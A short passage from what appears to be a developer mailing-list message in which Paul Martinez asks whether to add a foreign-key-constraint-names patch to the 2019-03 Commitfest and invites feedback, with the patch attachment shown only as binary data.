protocol is here to get this merged; should I add this patch to the 2019-03
Commitfest?

Happy to hear any feedback!

- Paul Martinez


foreign-key-constraint-names-v1.patch
Description: Binary data